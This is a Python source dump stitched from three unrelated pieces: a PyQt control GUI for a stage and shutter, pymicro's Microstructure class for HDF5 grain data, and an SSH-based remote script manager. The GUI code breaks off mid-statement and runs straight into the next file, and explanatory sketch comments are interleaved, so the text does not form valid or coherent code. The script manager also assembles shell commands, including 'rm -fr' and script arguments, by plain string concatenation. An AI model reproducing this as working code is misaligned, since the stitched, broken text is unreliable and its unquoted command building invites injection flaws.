self._DP_flipVertically = QtWidgets.QCheckBox("Flip Vertically")
self._DP_flipHorizontally = QtWidgets.QCheckBox("Flip Horizontally")
self._DP_allowDiagonals.setChecked(True)
self._DP_allowDiagonals.setToolTip("Diagonal pixels will also be considered adjacent\npixels when parsing the picture into lines.")
self._DP_flipVertically.setToolTip("Use a simple image to test whether flipping is necessary.\nImage is flipped BEFORE parsing it.")
self._DP_flipHorizontally.setToolTip("Use a simple image to test whether flipping is necessary.\nImage is flipped BEFORE parsing it.")
self._DP_prioritizeLeft = QtWidgets.QCheckBox("Search left before right")
self._DP_prioritizeLeft.setToolTip("Algorithm moves from right to left and searches for\na left pixel first before the right pixel.")
_DP_options_layout.addWidget(_DP_xscale_label , 0, 0, 1, 1)
_DP_options_layout.addWidget(self._DP_xscale , 0, 1, 1, 1)
_DP_options_layout.addWidget(_DP_yscale_label , 1, 0, 1, 1)
_DP_options_layout.addWidget(self._DP_yscale , 1, 1, 1, 1)
_DP_options_layout.addWidget(_DP_cutMode_label , 2, 0, 1, 1)
_DP_options_layout.addWidget(self._DP_cutMode , 2, 1, 1, 1)
_DP_options_layout.addWidget(self._DP_allowDiagonals , 2, 2, 1, 1)
_DP_options_layout.addWidget(self._DP_flipVertically , 1, 2, 1, 1)
_DP_options_layout.addWidget(self._DP_flipHorizontally , 0, 2, 1, 1)
_DP_options_layout.addWidget(self._DP_prioritizeLeft , 3, 0, 1, 3)
_DP_options_layout.setColumnStretch(0, 1)
_DP_options_layout.setColumnStretch(1, 2)
_DP_options_layout.setColumnStretch(2, 1)
_DP_options.setLayout(_DP_options_layout)
# / Options
self._DP_picture_parse = QtWidgets.QPushButton("Parse Picture")
_DP_moveToZero = QtWidgets.QLabel('Move to (0, 0), usually top-left, of the image using "Stage Movement"')
_DP_moveToZero.setWordWrap(True)
_DP_velocity_label = QtWidgets.QLabel("Velocity ({}m/s)".format(self.MICROSYMBOL))
_DP_velocity_label.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
self._DP_velocity = QtWidgets.QLineEdit("100")
self._DP_velocity.setValidator(QtGui.QDoubleValidator(0,10000, 12))
self._DP_picture_estimateTime = QtWidgets.QPushButton("Estimate Time")
self._DP_picture_draw = QtWidgets.QPushButton("Draw")
_DP_steps_labels = []
for i in range(6):
_temp_label = QtWidgets.QLabel("[{}]".format(i + 1))
_temp_label.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
_temp_label.setStyleSheet("font-family: Menlo, Consolas, monospace;")
_DP_steps_labels.append(_temp_label)
_DP_main_layout.addWidget(_DP_steps_labels[0], 0, 0, 1, 1)
# _DP_main_layout.addWidget(_DP_picture_fn_label, 1, 1, 1, 1)
_DP_main_layout.addWidget(self._DP_picture_fn, 0, 1, 1, 3)
_DP_main_layout.addWidget(self._DP_picture_btn, 0, 4, 1, 1)
_DP_main_layout.addWidget(_DP_steps_labels[1], 1, 0, 1, 1)
_DP_main_layout.addWidget(self._DP_picture_load, 1, 1, 1, 4)
_DP_main_layout.addWidget(_DP_steps_labels[2], 2, 0, 1, 1)
_DP_main_layout.addWidget(_DP_options, 2, 1, 1, 4)
_DP_main_layout.addWidget(_DP_steps_labels[3], 3, 0, 1, 1)
_DP_main_layout.addWidget(self._DP_picture_parse, 3, 1, 1, 4)
_DP_main_layout.addWidget(_DP_steps_labels[4], 4, 0, 1, 1)
_DP_main_layout.addWidget(_DP_moveToZero, 4, 1, 1, 4)
_DP_main_layout.addWidget(_DP_steps_labels[5], 5, 0, 1, 1)
_DP_main_layout.addWidget(_DP_velocity_label, 5, 1, 1, 1)
_DP_main_layout.addWidget(self._DP_velocity, 5, 2, 1, 3)
_DP_main_layout.addWidget(self._DP_picture_estimateTime, 6, 0, 1, 2)
_DP_main_layout.addWidget(self._DP_picture_draw, 6, 2, 1, 3)
_DP_main_layout.setColumnStretch(0, 1)
for i in range(1, 4):
_DP_main_layout.setColumnStretch(i, 2)
_DP_main.setLayout(_DP_main_layout)
# / DRAW PIC INTERFACE
# _drawpic_layout.addWidget(_DP_instructions, 0, 0)
_drawpic_layout.addWidget(self._DP_picture_preview, 0, 0, 1, 1)
_drawpic_layout.addWidget(_DP_instructions_scrollArea, 1, 0, 1, 1)
_drawpic_layout.addWidget(_DP_main, 0, 1, 2, 1)
_drawpic_layout.setColumnStretch(0, 1)
_drawpic_layout.setColumnStretch(1, 1)
_drawpic_layout.setRowStretch(0, 1)
_drawpic_layout.setRowStretch(1, 1)
return _drawpic_layout
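# --- standalone sketch (illustrative, not part of the class) -----------------
# QGridLayout.setColumnStretch distributes surplus width in proportion to the
# stretch factors, so the (1, 2, 1) factors used for the options grid above
# give the input column roughly twice the width of the label and checkbox
# columns. A rough, Qt-free approximation of that split:
def _split_width(total, stretches):
    s = sum(stretches)
    return [total * f // s for f in stretches]
# _split_width(400, (1, 2, 1)) -> [100, 200, 100]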
# INTERACTION FUNCTIONS
def initEventListeners(self):
# STAGE
self.UP, self.RIGHT, self.DOWN, self.LEFT = (0, 1), (1, 0), (0, -1), (-1, 0)
self.cardinalStageMoving = False
self.lastCardinalStageMove = datetime.datetime.now()
self._upArrow.clicked.connect(lambda: self.cardinalMoveStage(self.UP))
self._downArrow.clicked.connect(lambda: self.cardinalMoveStage(self.DOWN))
self._leftArrow.clicked.connect(lambda: self.cardinalMoveStage(self.LEFT))
self._rightArrow.clicked.connect(lambda: self.cardinalMoveStage(self.RIGHT))
self._homeBtn.clicked.connect(lambda: self.homeStage())
self._SL_invertx_checkbox.stateChanged.connect(lambda: self.invertCheck())
self._SL_inverty_checkbox.stateChanged.connect(lambda: self.invertCheck())
self._SL_velocity.textChanged.connect(lambda: self.recalculateKeystrokeTimeout())
self._SL_step_size.textChanged.connect(lambda: self.recalculateKeystrokeTimeout())
self.keyMapping = {
QtCore.Qt.Key_Up : "Up",
QtCore.Qt.Key_Down : "Down",
QtCore.Qt.Key_Left : "Left",
QtCore.Qt.Key_Right: "Right"
}
# self.keysPressed = {}
# Not implementing due to not being able to obtain keyPress events reliably
self.stage_widget.installEventFilter(self)
self.installEventFilter(self)
# Note: for the connections below we cannot pass self.checkSRValues to connect() directly, because Qt would call it with the signal's payload as an argument; the lambdas discard that payload (see the standalone sketch after this method).
# COMMON
self.operationDone.connect(self.on_operationDone)
self.EL_self_criticalDialog.connect(self.on_EL_self_criticalDialog)
# SINGLE RASTER
self._SR_velocity.textChanged.connect(lambda: self.checkSRValues())
self._SR_size_x.textChanged.connect(lambda: self.checkSRValues())
self._SR_size_y.textChanged.connect(lambda: self.checkSRValues())
self._SR_step_size.textChanged.connect(lambda: self.checkSRValues())
self._SR_raster_x.stateChanged.connect(lambda: self.checkSRValues())
self._SR_raster_y.stateChanged.connect(lambda: self.checkSRValues())
self._SR_retToOri.stateChanged.connect(lambda: self.checkSRValues())
self._SR_start.clicked.connect(lambda: self.checkSRValues(startRaster = True))
self._SR_pow_up.clicked.connect(lambda: self.adjustPower(direction = "+"))
self._SR_pow_dn.clicked.connect(lambda: self.adjustPower(direction = "-"))
self._SR_pow_step.textChanged.connect(lambda: self._SR_pow_step.setStyleSheet("background-color: none; color: #000;"))
# ARRAY RASTER
self._AR_init_velocity.textChanged.connect(lambda: self.recalculateARValues())
self._AR_init_power.textChanged.connect(lambda: self.recalculateARValues())
self._AR_X_mode.currentIndexChanged.connect(lambda: self.recalculateARValues())
self._AR_cols.textChanged.connect(lambda: self.recalculateARValues())
self._AR_X_intervals.textChanged.connect(lambda: self.recalculateARValues())
self._AR_X_spacing.textChanged.connect(lambda: self.recalculateARValues())
self._AR_Y_mode.currentIndexChanged.connect(lambda: self.recalculateARValues())
self._AR_rows.textChanged.connect(lambda: self.recalculateARValues())
self._AR_Y_intervals.textChanged.connect(lambda: self.recalculateARValues())
self._AR_Y_spacing.textChanged.connect(lambda: self.recalculateARValues())
self._AR_size_x.textChanged.connect(lambda: self.recalculateARValues())
self._AR_size_y.textChanged.connect(lambda: self.recalculateARValues())
self._AR_step_size.textChanged.connect(lambda: self.recalculateARValues())
self._AR_raster_x.stateChanged.connect(lambda: self.recalculateARValues())
self._AR_raster_y.stateChanged.connect(lambda: self.recalculateARValues())
self._AR_retToOri.stateChanged.connect(lambda: self.recalculateARValues())
self._AR_start.clicked.connect(lambda: self.recalculateARValues(startRaster = True))
# DRAW PIC
self._DP_picture_btn.clicked.connect(lambda: self._DP_getFile())
self._DP_picture_load.clicked.connect(lambda: self._DP_loadPicture())
self._DP_picture_parse.clicked.connect(lambda: self._DP_parsePicture())
self._DP_picture_estimateTime.clicked.connect(lambda: self._DP_drawPicture(estimateOnly = True))
self._DP_picture_draw.clicked.connect(lambda: self._DP_drawPicture())
self._DP_xscale.textChanged.connect(lambda: self._DP_optionsChanged())
self._DP_yscale.textChanged.connect(lambda: self._DP_optionsChanged())
self._DP_cutMode.currentIndexChanged.connect(lambda: self._DP_optionsChanged())
self._DP_allowDiagonals.stateChanged.connect(lambda: self._DP_optionsChanged())
self._DP_flipVertically.stateChanged.connect(lambda: self._DP_optionsChanged())
self._DP_flipHorizontally.stateChanged.connect(lambda: self._DP_optionsChanged())
self._DP_prioritizeLeft.stateChanged.connect(lambda: self._DP_optionsChanged())
self._DP_picture_fn.textChanged.connect(lambda: self._DP_filenameLineEditChanged())
self.picConvWarn.connect(self.on_picConvWarn)
# SHUTTER
self._close_shutter.clicked.connect(lambda: self.stageControl.controller.shutter.close())
self._open_shutter.clicked.connect(lambda: self.stageControl.controller.shutter.open())
self._abortBtn.clicked.connect(lambda: threading.Thread(target = self.KeyboardInterruptHandler, kwargs = dict(abortTrigger = True)).start())
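# --- standalone sketch (illustrative, not part of the class) -----------------
# Why the connections above wrap slots in lambdas: Qt signals such as
# textChanged pass their payload (new text, check state, index) to the
# connected callable, so connecting self.checkSRValues directly would receive
# that payload as a positional argument. A lambda with no parameters (or *_)
# discards it. Plain-Python illustration of the difference:
def _check_values(startRaster=False):
    return "startRaster={}".format(startRaster)
def _emit(slot, payload):
    # stand-in for a Qt signal emission that forwards its payload
    return slot(payload)
assert _emit(lambda *_: _check_values(), "42") == "startRaster=False"
# a direct connection would instead have produced "startRaster=42"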
# keyPressEvent(self, evt)
def eventFilter(self, source, evt):
# https://www.riverbankcomputing.com/static/Docs/PyQt4/qt.html#Key-enum
# print(evt)
if isinstance(evt, QtGui.QKeyEvent): #.type() ==
# Check source here
evtkey = evt.key()
# if (evt.type() == QtCore.QEvent.KeyPress):
# print("KeyPress : {}".format(key))
# if key not in self.keysPressed:
# self.keysPressed[key] = 1
# if key in self.keysPressed:
# del self.keysPressed[key]
# print("\033[K", str(self.keysPressed), end="\r")
if (evt.type() == QtCore.QEvent.KeyRelease):
# print("KeyRelease : {}".format(evtkey))
# All KeyRelease events go here
if evtkey == QtCore.Qt.Key_C and (evt.modifiers() & QtCore.Qt.ControlModifier):
# Will work everywhere
self.KeyboardInterruptHandler()
return True # Prevents further handling
if evtkey == QtCore.Qt.Key_Space:
self.stageControl.controller.shutter.close() if self.stageControl.controller.shutter.isOpen else self.stageControl.controller.shutter.open()
return True # Prevents further handling
# self.logconsole(self.lastCardinalStageMove)
# now = datetime.datetime.now()
# try:
# if now >= self.lastEvent + datetime.timedelta(seconds = 1):
# print(self.numEvents)
# self.numSeconds += 1
# self.lastEvent = now
# self.numEvents = 0
# except Exception as e:
# self.lastEvent = now
# self.numSeconds = 0
# self.numEvents = 0
#
# self.numEvents += 1
# ==> we deduce about 66 events / second
# we try to block it as early as possible
# WARNING: This still does not work as expected, unlike the previous VBA iteration of this tool
if source == self.stage_widget
# build the HDF5 file name: append 'data' to the sample name, adding a '_' if one is not present at the end of name
filename = name + (not name.endswith('_')) * '_' + 'data'
# prepare arguments for after file open
after_file_open_args = {'phase':phase}
# call SampleData constructor
SampleData.__init__(self, filename=filename, sample_name=name,
sample_description=description, verbose=verbose,
overwrite_hdf5=overwrite_hdf5,
autodelete=autodelete,
after_file_open_args=after_file_open_args)
return
def _after_file_open(self, phase=None, **kwargs):
"""Initialization code to run after opening a Sample Data file."""
self.grains = self.get_node('GrainDataTable')
if self._file_exist:
self.active_grain_map = self.get_attribute('active_grain_map',
'CellData')
if self.active_grain_map is None:
self.set_active_grain_map()
self._init_phase(phase)
if not hasattr(self, 'active_phase_id'):
self.active_phase_id = 1
else:
self.set_active_grain_map()
self._init_phase(phase)
self.active_phase_id = 1
return
def __repr__(self):
"""Provide a string representation of the class."""
s = '%s\n' % self.__class__.__name__
s += '* name: %s\n' % self.get_sample_name()
# TODO print phases here
s += '* lattice: %s\n' % self.get_lattice()
s += '\n'
# if self._verbose:
# for g in self.grains:
# s += '* %s' % g.__repr__
s += SampleData.__repr__(self)
return s
def minimal_data_model(self):
"""Data model for a polycrystalline microstructure.
Specify the minimal contents of the hdf5 (Group names, paths and group
types) in the form of a dictionary {content: location}. This extends
`~pymicro.core.SampleData.minimal_data_model` method.
:return: a tuple containing the two dictionaries.
"""
minimal_content_index_dic = {'Image_data': '/CellData',
'grain_map': '/CellData/grain_map',
'phase_map': '/CellData/phase_map',
'mask': '/CellData/mask',
'Mesh_data': '/MeshData',
'Grain_data': '/GrainData',
'GrainDataTable': ('/GrainData/'
'GrainDataTable'),
'Phase_data': '/PhaseData'}
minimal_content_type_dic = {'Image_data': '3DImage',
'grain_map': 'field_array',
'phase_map': 'field_array',
'mask': 'field_array',
'Mesh_data': 'Mesh',
'Grain_data': 'Group',
'GrainDataTable': GrainData,
'Phase_data': 'Group'}
return minimal_content_index_dic, minimal_content_type_dic
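# --- standalone sketch (hypothetical subclass, illustrative) -----------------
# The two dictionaries share their keys: the first maps an index name to its
# HDF5 path, the second maps the same name to a SampleData group/field type.
# A subclass extending the model could simply merge additional entries, e.g.:
def _extended_data_model(base_index, base_type):
    index, types = dict(base_index), dict(base_type)
    index['damage_map'] = '/CellData/damage_map'   # hypothetical extra field
    types['damage_map'] = 'field_array'
    return index, types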
def _init_phase(self, phase):
self._phases = []
if phase is None:
# create a default crystalline phase
phase = CrystallinePhase()
# if the h5 file does not exist yet, store the phase as metadata
if not self._file_exist: #FIXME is this useful?
self.add_phase(phase)
else:
self.sync_phases()
# if no phase is there, create one
if len(self.get_phase_ids_list()) == 0:
print('no phase was found in this dataset, adding a default one')
self.add_phase(phase)
return
def sync_phases(self):
"""This method sync the _phases attribute with the content of the hdf5
file.
"""
self._phases = []
# loop on the phases present in the group /PhaseData
phase_group = self.get_node('/PhaseData')
for child in phase_group._v_children:
d = self.get_dic_from_attributes('/PhaseData/%s' % child)
#print(d)
phase = CrystallinePhase.from_dict(d)
self._phases.append(phase)
#print('%d phases found in the data set' % len(self._phases))
def set_phase(self, phase):
"""Set a phase for the given `phase_id`.
If the phase id does not correspond to one of the existing phase,
nothing is done.
:param CrystallinePhase phase: the phase to use.
:param int phase_id:
"""
if phase.phase_id > self.get_number_of_phases():
print('the phase_id given (%d) does not correspond to any existing '
'phase, the phase list has not been modified.' % phase.phase_id)
return
d = phase.to_dict()
print('setting phase %d with %s' % (phase.phase_id, phase.name))
self.add_attributes(d, '/PhaseData/phase_%02d' % phase.phase_id)
self.sync_phases()
def set_phases(self, phase_list):
"""Set a list of phases for this microstructure.
The different phases in the list are added in that order.
:param list phase_list: the list of phases to use.
"""
# delete all nodes in the phase_group
self.remove_node('/PhaseData', recursive=True)
self.add_group('PhaseData', location='/', indexname='Phase_data')
self.sync_phases()
# add each phase
for phase in phase_list:
self.add_phase(phase)
def get_number_of_phases(self):
"""Return the number of phases in this microstructure.
Each crystal phase is stored in a list attribute: `_phases`. Note that
it may differ (although it should not) from the number of distinct
phase ids present in the phase_map array.
:return int: the number of phases in the microstructure.
"""
return len(self._phases)
def get_number_of_grains(self, from_grain_map=False):
"""Return the number of grains in this microstructure.
:return: the number of grains in the microstructure.
"""
if from_grain_map:
return len(np.unique(self.get_grain_map()))
else:
return self.grains.nrows
def add_phase(self, phase):
"""Add a new phase to this microstructure.
Before adding this phase, the phase id is set to the corresponding id.
:param CrystallinePhase phase: the phase to add.
"""
# this phase should have id self.get_number_of_phases() + 1
new_phase_id = self.get_number_of_phases() + 1
if not phase.phase_id == new_phase_id:
print('warning, adding phase with phase_id = %d (was %d)' %
(new_phase_id, phase.phase_id))
phase.phase_id = new_phase_id
self._phases.append(phase)
self.add_group('phase_%02d' % new_phase_id, location='/PhaseData',
indexname='phase_%02d' % new_phase_id, replace=True)
d = phase.to_dict()
self.add_attributes(d, '/PhaseData/phase_%02d' % new_phase_id)
print('new phase added: %s' % phase.name)
def get_phase_ids_list(self):
"""Return the list of the phase ids."""
return [phase.phase_id for phase in self._phases]
def get_phase(self, phase_id=None):
"""Get a crystalline phase.
If no phase_id is given, the active phase is returned.
:param int phase_id: the id of the phase to return.
:return: the `CrystallinePhase` corresponding to the id.
"""
if phase_id is None:
phase_id = self.active_phase_id
index = self.get_phase_ids_list().index(phase_id)
return self._phases[index]
def get_lattice(self, phase_id=None):
"""Get the crystallographic lattice associated with this microstructure.
If no phase_id is given, the `Lattice` of the active phase is returned.
:return: an instance of the `Lattice class`.
"""
return self.get_phase(phase_id).get_lattice()
def get_grain_map(self, as_numpy=True):
grain_map = self.get_field(self.active_grain_map)
if self._is_empty(self.active_grain_map):
grain_map = None
elif grain_map.ndim == 2:
# reshape to 3D
new_dim = self.get_attribute('dimension', 'CellData')
if len(new_dim) == 3:
grain_map = grain_map.reshape((new_dim))
else:
grain_map = grain_map.reshape((grain_map.shape[0],
grain_map.shape[1],
1))
return grain_map
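# --- standalone sketch (illustrative) ----------------------------------------
# The reshape above promotes a field stored as a 2D array in CellData to a 3D
# array with a single slice along the third axis, so downstream code can treat
# 2D and 3D grain maps uniformly:
import numpy as np
_field_2d = np.arange(12).reshape(3, 4)
_field_3d = _field_2d.reshape((_field_2d.shape[0], _field_2d.shape[1], 1))
assert _field_3d.shape == (3, 4, 1)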
def get_phase_map(self, as_numpy=True):
phase_map = self.get_field('phase_map')
if self._is_empty('phase_map'):
phase_map = None
elif phase_map.ndim == 2:
# reshape to 3D
new_dim = self.get_attribute('dimension', 'CellData')
if len(new_dim) == 3:
phase_map = phase_map.reshape((new_dim))
else:
phase_map = phase_map.reshape((phase_map.shape[0],
phase_map.shape[1],
1))
return phase_map
def get_mask(self, as_numpy=False):
mask = self.get_field('mask')
if self._is_empty('mask'):
mask = None
elif mask.ndim == 2:
# reshape to 3D
new_dim = self.get_attribute('dimension', 'CellData')
if len(new_dim) == 3:
mask = mask.reshape((new_dim))
else:
mask = mask.reshape((mask.shape[0],
mask.shape[1],
1))
return mask
def get_ids_from_grain_map(self):
"""Return the list of grain ids found in the grain map.
By convention, only positive values are taken into account, 0 is
reserved for the background and -1 for overlap regions.
:return: a 1D numpy array containing the grain ids.
"""
grain_map = self.get_node('grain_map')
grains_id = np.unique(grain_map)
grains_id = grains_id[grains_id > 0]
return grains_id
def get_grain_ids(self):
"""Return the grain ids found in the GrainDataTable.
:return: a 1D numpy array containing the grain ids.
"""
return self.get_tablecol('GrainDataTable', 'idnumber')
@staticmethod
def id_list_to_condition(id_list):
"""Convert a list of id to a condition to filter the grain table.
The condition will be interpreted using Numexpr typically using
a `read_where` call on the grain data table.
:param list id_list: a non empty list of the grain ids.
:return: the condition as a string.
"""
if not len(id_list) > 0:
raise ValueError('the list of grain ids must not be empty')
condition = "\'(idnumber == %d)" % id_list[0]
for grain_id in id_list[1:]:
condition += " | (idnumber == %d)" % grain_id
condition += "\'"
return condition
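# --- standalone sketch (illustrative) ----------------------------------------
# The helper returns a *quoted* Numexpr condition; callers such as
# get_grain_volumes() eval() it back to a plain string before handing it to
# the PyTables read_where call. For id_list = [1, 4] the value is:
_cond = "'(idnumber == 1) | (idnumber == 4)'"
assert eval(_cond) == '(idnumber == 1) | (idnumber == 4)'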
def get_grain_volumes(self, id_list=None):
"""Get the grain volumes.
The grain data table is queried and the volumes of the grains are
returned in a single array. An optional list of grain ids can be used
to restrict the grains, by default all the grain volumes are returned.
:param list id_list: a non empty list of the grain ids.
:return: a numpy array containing the grain volumes.
"""
if id_list:
condition = Microstructure.id_list_to_condition(id_list)
return self.grains.read_where(eval(condition))['volume']
else:
return self.get_tablecol('GrainDataTable', 'volume')
def get_grain_centers(self, id_list=None):
"""Get the grain centers.
The grain data table is queried and the centers of the grains are
returned in a single array. An optional list of grain ids can be used
to restrict the grains, by default all the grain centers are returned.
:param list id_list: a non empty list of the grain ids.
:return: a numpy array containing the grain centers.
"""
if id_list:
condition = Microstructure.id_list_to_condition(id_list)
return self.grains.read_where(eval(condition))['center']
else:
return self.get_tablecol('GrainDataTable', 'center')
def get_grain_rodrigues(self, id_list=None):
"""Get the grain rodrigues vectors.
The grain data table is queried and the rodrigues vectors of the grains
are returned in a single array. An optional list of grain ids can be
used to restrict the grains, by default all the grain rodrigues vectors
are returned.
:param list id_list: a non empty list of the grain ids.
:return: a numpy array containing the grain rodrigues vectors.
"""
if id_list:
condition = Microstructure.id_list_to_condition(id_list)
return self.grains.read_where(eval(condition))['orientation']
else:
return self.get_tablecol('GrainDataTable', 'orientation')
def get_grain_orientations(self, id_list=None):
"""Get a list of the grain orientations.
The grain data table is queried to retrieve the rodrigues vectors.
An optional list of
# -*- coding:utf-8 -*-
"""
Copyright 2021 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import time
import hashlib
import datetime
import subprocess
from api.discovery import SSH
from api.setting import Setting, decrypt_password
from api import script
from api import reporter
from api import node
class ScriptManager:
def __init__(self, ESConnector):
self.ES = ESConnector
self.settings = Setting(self.ES)
self._ansible_inventory_file = None
self._ansible_playbook_file = None
self._ansible_session_id = None
self._ansible_session_dir = None
self._node_id = None
self._realm_settings = None
self._scenario_id = None
self._script_id = None
self._script_args = None
self._script_name = None
self._script_description = None
self._script_locker = None
self._script_realm = None
self._script_destination = None
self._script_filename = None
self._script_output = None
self._script_report_id = None
self._script_report = None
self._script_type = None
self._script_content = None
self._execution_id = None
@property
def ansible_inventory_file(self):
return self._ansible_inventory_file
@ansible_inventory_file.setter
def ansible_inventory_file(self, ansible_inventory_file):
self._ansible_inventory_file = ansible_inventory_file
@property
def ansible_playbook_file(self):
return self._ansible_playbook_file
@ansible_playbook_file.setter
def ansible_playbook_file(self, ansible_playbook_file):
self._ansible_playbook_file = ansible_playbook_file
@property
def ansible_session_id(self):
return self._ansible_session_id
@ansible_session_id.setter
def ansible_session_id(self, ansible_session_id):
self._ansible_session_id = ansible_session_id
@property
def ansible_session_dir(self):
return self._ansible_session_dir
@ansible_session_dir.setter
def ansible_session_dir(self, ansible_session_dir):
self._ansible_session_dir = ansible_session_dir
@property
def node_id(self):
return self._node_id
@node_id.setter
def node_id(self, node_id: str):
self._node_id = node_id
@property
def realm_settings(self):
return self._realm_settings
@realm_settings.setter
def realm_settings(self, realm_settings):
self._realm_settings = realm_settings
@property
def scenario_id(self):
return self._scenario_id
@scenario_id.setter
def scenario_id(self, scenario_id: str):
self._scenario_id = scenario_id
@property
def script_id(self):
return self._script_id
@script_id.setter
def script_id(self, script_id: str):
self._script_id = script_id
@property
def script_args(self):
return self._script_args
@script_args.setter
def script_args(self, script_args: str):
self._script_args = script_args
@property
def script_name(self):
return self._script_name
@script_name.setter
def script_name(self, script_name: str):
self._script_name = script_name
@property
def script_description(self):
return self._script_description
@script_description.setter
def script_description(self, script_description: str):
self._script_description = script_description
@property
def script_output(self):
return self._script_output
@script_output.setter
def script_output(self, script_output: str):
self._script_output = script_output
@property
def script_report(self):
return self._script_report
@script_report.setter
def script_report(self, script_report: dict):
self._script_report = script_report
@property
def script_report_id(self):
return self._script_report_id
@script_report_id.setter
def script_report_id(self, script_report_id: str):
self._script_report_id = script_report_id
@property
def script_realm(self):
return self._script_realm
@script_realm.setter
def script_realm(self, script_realm: str):
self._script_realm = script_realm
@property
def script_type(self):
return self._script_type
@script_type.setter
def script_type(self, script_type: str):
self._script_type = script_type
@property
def script_destination(self):
return self._script_destination
@script_destination.setter
def script_destination(self, script_destination):
self._script_destination = script_destination
@property
def script_locker(self):
return self._script_locker
@script_locker.setter
def script_locker(self, script_locker):
self._script_locker = script_locker
@property
def script_filename(self):
return self._script_filename
@script_filename.setter
def script_filename(self, script_filename):
self._script_filename = script_filename
@property
def script_content(self):
return self._script_content
@script_content.setter
def script_content(self, script_content):
self._script_content = script_content
@property
def execution_id(self):
return self._execution_id
@execution_id.setter
def execution_id(self, execution_id):
self._execution_id = execution_id
def __close_script_report(self):
"""
This function closes an existing script report
"""
try:
print(" >>> Enter file:scenarioManager:class:scenarioManager:func:__close_script_report")
self.script_report["end_at"] = datetime.datetime.isoformat(datetime.datetime.utcnow())
self.script_report["status"] = "ended"
self.script_report["duration"]["end_at"] = datetime.datetime.now().timestamp()
self.script_report["duration"]["time"] = self.script_report["duration"]["end_at"] - self.script_report["duration"]["start_at"]
script_reporter = reporter.Reporter(self.ES, report_type="script")
resp = script_reporter.update(self.script_report_id, self.script_report)
return True if resp["result"] == "updated" else False
except Exception as e:
print("backend Exception, file:scriptManager:class:scriptManager:func:__close_script_report")
print(e)
return {"failure": str(e)}
def __update_script_report(self):
try:
print(self.script_report_id, self.script_report)
script_reporter = reporter.Reporter(self.ES, report_type="script")
resp = script_reporter.update(self.script_report_id, self.script_report)
return True if resp["result"] == "updated" else False
except Exception as e:
print("backend Exception, file:scriptManager:class:scriptManager:func:update_script_report")
print(e)
return {"failure": str(e)}
def __open_script_report(self):
"""
This function opens a new script run report
"""
try:
print(" >>> Enter file:scriptManager:class:scriptManager:func:__open_script_report")
self.script_report = {
"report_type": "script",
"scenario_id": self.scenario_id,
"script_id": self.script_id,
"node_id": self.node_id,
"name": self.script_name,
"description": self.script_description,
"realm": self.script_realm,
"start_at": datetime.datetime.isoformat(datetime.datetime.utcnow()),
"status": "running",
"execution_id": self.execution_id,
"output": "",
"duration": {
"start_at": datetime.datetime.now().timestamp()
}
}
script_reporter = reporter.Reporter(self.ES, report_type="script")
resp = script_reporter.__add__(self.script_report)
print(resp)
if resp["result"] == "created":
self.script_report_id = resp["_id"]
return True
else:
return False
except Exception as e:
print("backend Exception, file:scriptManager:class:scriptManager:func:__open_script_report")
print(e)
return {"failure": str(e)}
def node_details(self, realm: str, node_id: list):
try:
nod = node.Node(self.ES)
return nod.list_by_ids(realm, node_id)
except Exception as e:
print("backend Exception, file:scriptManager:class:scriptManager:func:node_details")
print(e)
return {"failure": str(e)}
def script_details(self, realm: str, script_id: str):
try:
scr = script.Script(self.ES)
return scr.list_by_ids(realm, script_id.split(" "))["hits"]["hits"][0]
except Exception as e:
print("backend Exception, file:scriptManager:class:scriptManager:func:script_details")
print(e)
return {"failure": str(e)}
def ssh_connector(self, realm: str, node: str):
try:
print(" >>> Enter file:scenarioManager:class:scenarioManager:func:ssh_connector")
return SSH(node, **{"username": self.realm_settings["hits"]["hits"][0]["_source"]["ssh"]["username"],
"password": self.settings.list_ssh_password_by_realm(realm),
"certificate": self.realm_settings["hits"]["hits"][0]["_source"]["ssh"]["certificate"]})
except Exception as e:
print("backend Exception, file:scriptManager:class:scriptManager:func:ssh_connector")
print(e)
return {"failure": str(e)}
@staticmethod
def is_all_threads_alive(thread_list):
is_terminated = True
for th in thread_list:
if th.is_alive():
is_terminated = False
return is_terminated
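# --- standalone sketch (illustrative, not part of the class) -----------------
# Despite its name, is_all_threads_alive returns True only when *no* thread in
# the list is still alive, i.e. "all threads have terminated". It is
# equivalent to:
def _all_threads_terminated(thread_list):
    return not any(th.is_alive() for th in thread_list)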
def build_remote_env(self, node_name, script_content, script_destination):
try:
print(" >>> Enter file:scriptManager:class:scriptManager:function:build_remote_env")
ssh = self.ssh_connector(self.script_realm, node_name)
ssh.open_ssh_connection()
ssh_command = 'mkdir -p `dirname ' + script_destination + '`'
ssh.ssh_client.exec_command(ssh_command)
ssh_command = '> ' + script_destination + ' ;'\
+ 'chmod 700 ' + script_destination + ' ;'\
+ 'cat <<\'EOF\' >' + script_destination + '\n'\
+ script_content + '\n'\
'EOF'
print(ssh_command)
ssh.ssh_client.exec_command(ssh_command)
ssh.close_ssh_connection()
return True
except Exception as e:
print("backend Exception, file:scriptManager:class:scriptManager:func:send_script_to_remote")
print(e)
return {"failure": str(e)}
def destroy_remote_env(self, node_name, script_destination):
try:
print(" >>> Enter file:scriptManager:class:scriptManager:function:destroy_remote_env")
ssh = self.ssh_connector(self.script_realm, node_name)
ssh.open_ssh_connection()
ssh_command = 'rm -fr `dirname ' + script_destination + '`'
ssh.ssh_client.exec_command(ssh_command)
ssh.close_ssh_connection()
return True
except Exception as e:
print("backend Exception, file:scriptManager:class:scriptManager:func:destroy_remote_env")
print(e)
return {"failure": str(e)}
def exec_remote_script(self, node_name):
try:
print(" >>> Enter file:scriptManager:class:scriptManager:function:exec_remote_script")
run_command = 'echo $$ > ' + self.script_locker + ' ; ' + self.script_destination + " " + self.script_args
print(run_command)
ssh = self.ssh_connector(self.script_realm, node_name)
ssh.open_ssh_connection()
transport = ssh.ssh_client.get_transport()
channel = transport.open_session()
channel.exec_command(run_command)
while True:
if channel.exit_status_ready():
channel.close()
transport.close()
ssh.close_ssh_connection()
break
else:
self.script_report["output"] = self.script_report["output"] + str(
channel.recv(8092).decode('UTF-8'))
print("update output of script", self.script_name, self.execution_id, self.script_report["output"])
self.__update_script_report()
time.sleep(0.5)
return True
except Exception as e:
print("backend Exception, file:scriptManager:class:scriptManager:func:exec_remote_script")
print(e)
